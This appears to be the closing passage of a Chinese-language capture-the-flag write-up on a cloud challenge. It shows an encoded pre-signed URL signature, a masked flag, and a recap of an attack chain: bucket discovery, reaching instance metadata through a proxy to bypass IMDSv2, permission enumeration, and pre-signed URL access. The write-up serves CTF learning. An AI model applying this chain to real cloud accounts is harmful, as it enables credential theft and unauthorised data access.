%6a%43%6a%69%49%6b%77%44%39%69%25%32%46%65%54%25%32%46%78%78%50%4d%57%31%59%71%69%64%32%43%6b%42%4c%70%37%53%57%33%59%6a%65%71%4d%35%49%71%4b%76%66%50%68%71%74%4b%61%77%36%6d%4e%63%41%75%36%36%39%51%32%51%51%66%4c%51%56%38%48%75%51%62%54%44%30%45%66%39%70%79%38%49%38%54%54%31%34%4b%25%32%46%75%52%47%59%7a%75%68%75%32%47%31%4a%70%6f%62%51%4b%44%70%31%59%31%58%70%45%6c%73%6c%78%25%32%46%50%69%61%53%39%46%54%4a%48%73%7a%4d%25%32%42%58%63%61%51%6e%31%35%5a%62%46%57%73%73%74%47%72%6e%71%25%32%46%57%4a%53%51%7a%4d%54%77%66%6d%48%65%6a%68%65%7a%43%59%61%77%47%7a%25%32%42%58%37%76%76%64%48%48%6e%39%75%41%39%55%25%33%44%26%45%78%70%69%72%65%73%3d%31%37%35%32%31%37%31%34%38%37The flag is: ********成功总结总的来说真的是很有实战意义的一次挑战感觉整个过程前因后果是非常连贯的获取桶名称-不能匿名访问-获取配置信息-元数据不能直接访问-走代理mapping 泄露 proxy元数据绕过 IMDSv2 安全机制获取用户信息查看权限列取文件位置vpc 限制来联想 proxy403考虑预签名 URL 授予行云流水

相关新闻